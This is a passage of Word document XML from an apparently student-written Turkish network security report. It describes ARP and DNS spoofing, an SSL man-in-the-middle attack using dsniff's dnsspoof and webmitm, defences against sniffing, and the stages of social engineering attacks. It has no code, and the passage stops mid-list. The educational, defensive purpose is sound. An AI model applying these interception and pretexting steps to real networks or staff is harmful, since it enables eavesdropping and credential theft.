        <w:t>5. Adım 1'de etkinleştirilen IP iletme özelliği, tüm trafiği saldırganın makinesinden LAN için varsayılan yönlendiriciye yönlendirir. Varsayılan yönlendirici trafiği dış dünyaya iletir. Bu şekilde, kurban dış dünyaya trafik gönderebilecek, ancak dışarı çekilmek için saldırganın makinesinden geçecek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Bu adım dizisi, saldırganın dış dünyaya giden tüm trafiği hedef sistemden görmesini sağlar. Bu teknik için saldırganın anahtarı değiştirmediğini unutmayın. Saldırgan, mağdurun ARP tablosunu değiştirerek değiştirilmiş LAN'ı koklayabiliyor. ARP trafiği ve ilgili MAC adres bilgileri yalnızca bir LAN üzerinden iletildiğinden, bu teknik yalnızca saldırgan hedef sistemle aynı LAN üzerindeki bir makineyi kontrol ettiğinde çalışır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc10010051"/>
      <w:r>
        <w:t>5.5. Sahte DNS İstemcisi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="001D1705">
        <w:t xml:space="preserve">Bir LAN'ın ötesine trafik koklamak için bir ağa paket enjekte etme tekniği, Alan Adı Sistemini (DNS) değiştirmeyi içerir. ARP bir LAN üzerinde IP adreslerini bir LAN </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1705">
        <w:lastRenderedPageBreak/>
        <w:t>üzerindeki MAC adresleriyle eşlemek için kullanılırken, DNS bir ağ üzerinde alan adlarını IP adreslerine eşlemek için kullanılır. Bir kullanıcı bir web tarayıcısına www.skoudisstuff.com adresini girme gibi bazı istemci yazılımlarına bir alan adı girdiğinde, kullanıcının sistemi bir DNS sunucusuna bir sorgu gönderir. DNS sunucusu genellikle ağ üzerinde farklı bir LAN'da bulunur. Sorgu alındıktan sonra, DNS sunucusu yapılandırılmasında uygun bilgiyi arar ve kullanıcının makinesine 10.22.12.41 gibi bir IP adresi içeren bir DNS yanıtı gönderir. DNS sunucusu, alan adını kullanıcının IP adresine eşleştirir. Saldırganlar müşteriye sahte DNS yanıtları göndererek trafiği yönlendirebilirler. Kibar bir DNS yanıtı gibi bir şey olmamasına rağmen, hedef sistemle DNS sunucusu arasında herhangi bir ağa oturan bir saldırgan, DNS sorgularını satırdan çekebilir. Bir istemciden bir DNS sorgusu göründüğünde, saldırgan, istemciye, saldırganın makinesinin IP adresini içeren sahte bir DNS yanıtı gönderebilir. Kullanıcıların makinesindeki istemci yazılımı, istenen sunucuyla iletişim kurduğunu düşünerek paketleri bu IP adresine gönderir. Bunun yerine, bilgiler saldırganın makinesine gönderilir. Saldırgan, geleneksel bir sniffer kullanarak bilgileri görüntüleyebilir ve trafiği hedeflenen yere aktarabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc10010052"/>
      <w:r>
        <w:t>5.6. SSL Saldırısı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bir ağa sahte DNS yanıtları enjekte etmek, genellikle güvenli Web erişimi için kullanılan SSL gibi şifreleme protokollerine karşı ortada bir saldırı oluşturmak için kullanıldığında özellikle güçlü bir tekniktir. Esasen, saldırgan, saldırganın makinesinde yeni bir SSL oturumu oluşturmak için hedefe sahte bir DNS yanıtı gönderir. Sergi 11.3'te vurgulandığı gibi, saldırgan iki şifreleme oturumu ayarlamak için özel bir aktarma aracı kullanır: biri istemci ile saldırgan arasında, diğeri saldırgan ile sunucu arasında. Veriler bu oturumlar arasında hareket ederken, saldırgan açık metni görüntüleyebilir. Sergi 11.3'te gösterilen adımlar şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>1. Saldırgan, sahte DNS yanıtları gönderen bir araç olan Dsniff’in dnsspoof programını etkinleştirir. Ek olarak, saldırgan, Web Monkey-in-the-Middle'ın kısaltması olan "webmitm" adlı başka bir Dsniff aracını etkinleştirir. Bu araç özel bir SSL geçişi uygular.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>2. Saldırgan, kurban makinesinden bir DNS sorgusu gözlemler ve sahte bir DNS yanıtı gönderir. Sahte DNS yanıtı, saldırganın makinesinin IP adresini içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>3. Mağdur DNS cevabını alır ve cevabın içerdiği IP adresiyle bir SSL oturumu açar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>4. Saldırganın makinesinde çalışan webmitm aracı, kurban makine ile bir SSL oturumu ve istemcinin erişmek istediği gerçek Web sunucusuyla bir başka SSL oturumu kurdu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00462187" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>5. Mağdur, SSL bağlantısı üzerinden veri gönderir. Webmitm aracı, kurbanla olan SSL bağlantısından gelen trafiği şifresini çözer, saldırgan için gösterir ve trafiği harici Web sunucusuna geçiş için şifreler. Harici Web sunucusu trafiği alır, ortadaki bir kişinin saldırısının gerçekleştiğinin farkına varmaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc10010053"/>
      <w:r>
        <w:t>5.7. Aktif Snifing Tekniklerine Karşı Savunma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00462187">
        <w:t xml:space="preserve">Bir saldırganın, ağlama araçlarını kullanarak bir ağdan her türlü faydalı bilgiyi nasıl alabileceğini gördükten sonra, bu saldırılara karşı nasıl bir savunma yapabilir? İlk olarak, mümkün olduğunda, ağ üzerinden iletilen verileri şifreleyin. Web trafiği için SSL, şifreli oturum açma oturumları ve dosya aktarımı için SSH, şifreli e-postalar için S / MIME ve ağ katmanı şifrelemesi için IPSec gibi güvenli protokolleri kullanın. Kullanıcıların, hem bilgileri hem de farkındalık bakış açısıyla hassas bilgileri korumak için bu araçları kullanması için donanımlı olması gerekir. Sistem yöneticilerinin, ağ yöneticilerinin ve güvenlik personelinin iş faaliyetlerini yürütmek için güvenli </w:t>
      </w:r>
      <w:r w:rsidRPr="00462187">
        <w:lastRenderedPageBreak/>
        <w:t>protokolleri anlamaları ve kullanmaları özellikle önemlidir. Asla güvenlik duvarına, yönlendiricilere, hassas sunuculara veya ortak anahtar altyapı (PKI) sistemlerine telnet yapmayın! Bir saldırganın telnet'in açık metin olarak ilettiği bir şifreyi engellemesi çok kolaydır. Ayrıca, tarayıcıdan ve SSH istemcisinden gelen uyarı mesajlarına dikkat edin. Güvenilmeyen bir sertifika ile oluşturulan bir SSL oturumu kullanarak ağ üzerinden hassas bilgiler göndermeyin. SSH istemcisi, sunucunun genel anahtarının gizemli bir şekilde değiştiği konusunda uyarırsa, araştırmaya ihtiyaç vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00462187">
        <w:t>Ek olarak, gerçekten de hub'lardan kurtulmayı düşünmelisiniz, çünkü kolayca koklanamayacak kadar kolaydırlar. Maliyet hub'lardan daha yüksek olsa da, anahtarlar yalnızca güvenliği artırmakla kalmaz aynı zamanda performansı da artırır. Anahtarlamalı bir ağa tam bir geçiş yapmak mümkün değilse, en azından kritik ağ segmentlerinde, özellikle de DMZ'de anahtarlamalı Ethernet kullanmayı düşünün. Son olarak, çok hassas sistemler ve veriler içeren ağlar için, MAC problemlerini ve sahte ARP mesajlarını önlemek için her bir port portunu makinenin belirli MAC adresi ile o portu kullanarak ayarlayarak portlarınızdaki güvenliği sağlayın. Ayrıca, İnternet DMZ'ler gibi son derece hassas ağlar için, uç makinelerdeki statik ARP tablolarını kullanın ve LAN adresindeki tüm sistemler için MAC adreslerini sabit kodlayın. Bir anahtar ve sabit kodlanmış ARP tablolarındaki bağlantı noktası güvenliği, yönetimi zor olabilir çünkü bileşenleri değiştirmek veya hatta Ethernet kartları, birçok sistemde depolanan MAC adreslerinin güncellenmesini gerektirir. İnternet DMZ'leri gibi çok hassas ağlar için bu güvenlik seviyesi gereklidir ve uygulanmalıdır.</w:t>
      </w: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Pr="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="217" w:lineRule="auto"/>
        <w:ind w:left="942" w:right="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E77DF4">
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Section 1.5.3. Social Engineering: The Forgotten Risk - Sosyal Mühendislik: Unutulmuş Risk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="82"/>
        <w:ind w:left="10" w:right="158" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Mustafa ALACA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="82"/>
        <w:ind w:left="10" w:right="157" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>130757037</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:after="343"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc10010054"/>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:t xml:space="preserve"> Social Engineering: The Forgotten Risk - Sosyal Mühendislik: Unutulmuş Risk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="5" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Bilgi ve bilgi teknolojisi güvenliği hakkında düşündüğümüzde, ortak dikkatimizi bu güvenlik zincirinin belirli teknik alanlarına odaklamalıyız.Çünkü sistemler en zayıf halkaları kadar güçlüdürler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="5" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu bölüm, bu saldırının nasıl çalıştığını, kullanılan yaygın yöntemlerin neler olduğunu ve uygun eğitim, farkındalık eğitimi ve diğer kontrollerle sosyal mühendislik riskini nasıl azaltabileceğimizi inceleyerek sosyal mühendisliğe ışık tutmaya çalışmaktadır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="5" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Bunun “nasıl yapılır” bölümü olması amaçlanmamıştır, bunun yerine , bu tür saldırıların ayrıntılarının ve sosyal mühendislik mağduru olmanın nasıl önlenebileceğinin tartışılmasıdır.Bu bölüm, bu saldırının nasıl çalıştığını, kullanılan yaygın yöntemlerin neler olduğunu ve uygun eğitim, farkındalık eğitimi ve diğer kontrollerle sosyal mühendislik riskini nasıl azaltabileceğimizi inceleyerek sosyal mühendisliğe ışık tutmaya çalışmaktadır. Bunun “nasıl yapılır” bölümü olması amaçlanmamıştır, bunun yerine , bu tür saldırıların ayrıntılarının ve sosyal mühendislik mağduru olmanın nasıl önlenebileceğinin tartışılmasıdır.Bu bilgilerin hiçbiri gizli değildir; toplumun belli kesimleri tarafından zaten bilinir. Bu nedenle, bilgi güvenliği uzmanlarının riski azaltmak için sosyal mühendislikten ve güvenlik kontrollerinden haberdar olmaları da önemlidir .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc10010055"/>
      <w:r>
        <w:t>7. Sosyal Mühendisliğin Tanımlanması</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="263" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Sosyal mühendisliğin ne olduğunu anlamak için önce neyin tartışıldığını net bir şekilde tanımlamak önemlidir. “Sosyal mühendislik” terimi yeni bir terim değildir. Sosyal kontrol alanından geliyor. Sosyal mühendislik, arzu edilen bir sonucu elde etmek için bir toplumu yeniden tanımlama sürecine (veya daha doğrusu bir mühendislik topluluğuna) atıfta bulunabilir.Bu terim aynı zamanda insanların davranışlarını öngörülebilir bir şekilde, genellikle yeni bir sisteme uymaları için değiştirmeye teşebbüs etme sürecini de ifade edebilir .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="263" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bu noktada sosyal mühendislik probleminin görünür büyüklüğü hakkında bazı bilgiler eklemek çok ilginç olurdu. Ne yazık ki, bu amaç için kullanılacak çok az </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>veri var. Bilgi güvenliği alanındaki sık sık sosyal mühendisliğe yapılan atıflara rağmen, bu tür bir saldırı hakkında doğrudan bir tartışma yapılmamıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc10010056"/>
      <w:r>
        <w:t>8. Sosyal Mühendislik Neden İş Yapıyor?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="59"/>
        <w:ind w:firstLine="705"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:t xml:space="preserve">Sosyal mühendislik saldırılarının başarısı temel olarak iki faktörden kaynaklanıyor: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="19"/>
        <w:ind w:left="1065" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:t xml:space="preserve">Temel insan doğası </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="19"/>
        <w:ind w:left="1065" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:t>İş  ortamı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="19"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc10010057"/>
      <w:r>
        <w:t>8.1.İnsan Doğası</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="5" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bir sosyal mühendislik saldırısına kurban olmak, istihbaratla ve insan olmakla ilgili, biraz saf olmayan ve bu tür bir saldırı ile başa çıkmak için uygun bir zihinsel düzen ve eğitime sahip olmakla ilgisi yoktur. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="5" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">İnsanlar, çoğunlukla, doğası gereği güveniyor ve işbirliği yapıyorlar. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:right="5" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Sosyal psikoloji çalışmalar, doğru duruma konan ve yetenekli bir kişiyle ilgilenen hemen hemen herkesin belirli bir şekilde davranması veya genellikle diğer durumlarda yapamayacağı bilgileri ifşa etmesinin etkilenebileceği sonucuna varmıştır.Bu çalışmalar aynı zamanda otorite içinde olan veya otorite içinde olma havasına sahip kişilerin diğer insanları kolayca korkuttuklarını da tespit etti.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc10010058"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.2.İş Ortamı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="226" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="5" w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>İnsan doğası, birleşme ve satın almaların şu andaki iş eğilimi, teknolojideki hızlı gelişmeler ve geniş alan ağlarının yaygınlaşması iş ortamını sosyal mühendisliğe elverişli hale getirmiştir. Günümüzün iş dünyasında, bir kişinin kendi kuruluşundan, tedarikçilerinden, tedarikçilerinden ve müşterilerinden oluşan kişiler de dahil olmak üzere, düzenli olarak uğraştığı insanlarla hiçbir zaman tanışmaması normal değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="228" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="5"/>
      </w:pPr>
      <w:r>
        <w:t>Çalışanlar için telekomünikasyon teknolojilerinin yaygın olarak benimsenmesiyle yüz yüze insan etkileşimi daha da nadir hale geliyor. Günümüz pazarında, bir kuruluş için çalışabilir ve birkaç istisna dışında, nadiren ofise ayak basabilir. Çalışma ortamımızdaki insanlarla olan bu soyutlama katmanına rağmen, aslında hiç karşılaşmadığımız kişiler dahil olmak üzere insanlara olan temel güvenimiz oldukça sağlam kaldı.Çalışanlar işe alınırken,  görevleri yerine getirirken güvenlik konusunda ne kadar bilgisi olmasına bakılmaz ve bu da büyük bir hatadır.Bu sosyal Mühendislik tehdidi etkili bir şekilde ele almak için değişmesi gereken paradigmadır..Sosyal Mühendislik Saldırıları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="226" w:line="216" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sosyal mühendislik saldırıları aşamalı bir yaklaşımı takip etme eğilimindedir ve çoğu durumda saldırılar istihbarat teşkilatlarının hedeflerine nasıl sızdığını gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="101" w:line="216" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bu aşamalar ise :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="19"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:t>İstihbarat toplama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="19"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:t>Hedef seçme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="19"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:t>Saldırı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc10010059"/>
      <w:r>
        <w:t>8.3. İstihparat Toplama</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="226" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="5" w:firstLine="501"/>
      </w:pPr>
      <w:r>
        <w:t>Başarılı bir sosyal mühendislik saldırısının anahtarlarından biri bilgidir. Bir şirket çalışanı, bir satıcı temsilcisi veya bazı durumlarda bir düzenleyici veya yasa uygulama organının bir üyesi gibi konuşabilmek için bir kuruluş ve personeli hakkında yeterli bilgi toplamak şaşırtıcı derecede kolaydır.Saldırgan bu bilgileri şirketlerin web sitelerinde şirket bilgilerini (şube bilgisi, telefon dizini ,kuruluş amaçları vb.) , ve çöplüklerini araştırarak ulaştığı fatura, yazışmalar, el kitapları vb. saldırgana çoğu gerekli bilgiyi sağlar.Saldırganın bu aşamadaki amacı, meşru bir çalışan, yüklenici, satıcı, stratejik ortak veya bazı durumlarda bir kolluk görevlisi gibi konuşabilmek için olabildiğince fazla bilgi edinmektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc10010060"/>
      <w:r>
        <w:t>8.4. Hedef Seçme</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Uygun miktarda bilgi toplandıktan sonra, saldırgan kurum personelinde gözle görülür zayıflıklar arar.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:t>En yaygın hedef yardım masası personelidir, çünkü bu profesyoneller yardım vermek için eğitilmişlerdir ve genellikle parolaları değiştirebilir, hesap oluşturabilir, hesapları yeniden etkinleştirebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Çoğu saldırganın amacı ya hassas bilgileri toplamak ya da bir sisteme ayak basmaktır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="162" w:line="216" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Saldırganlar, bir misafir düzeyinde bile erişime sahip olduklarında, ayrıcalıklarını arttırmanın, daha yıkıcı saldırılar başlatmanın ve izlerini gizlemenin nispeten kolay olduğunu fark eder.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İ</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dari asistanlar sıradaki en yaygın kurbanlardır. Bu, büyük ölçüde, bu bireylerin normalde üst düzey yönetim üyeleri arasında akan çok miktarda hassas bilgiye sahiptirler.İdari asistanlar, bir saldırı noktası olarak ya da organizasyondaki etkili kişilerin isimleriyle ilgili ek bilgi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>toplamak için kullanılabilir.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc10010061"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.5. Saldırı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="58" w:line="216" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6345E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gerçek atak genellikle biz en yaygın bir diyeceğimiz dayanmaktadır Bu üç kategoriye ayrılır : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E6345E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
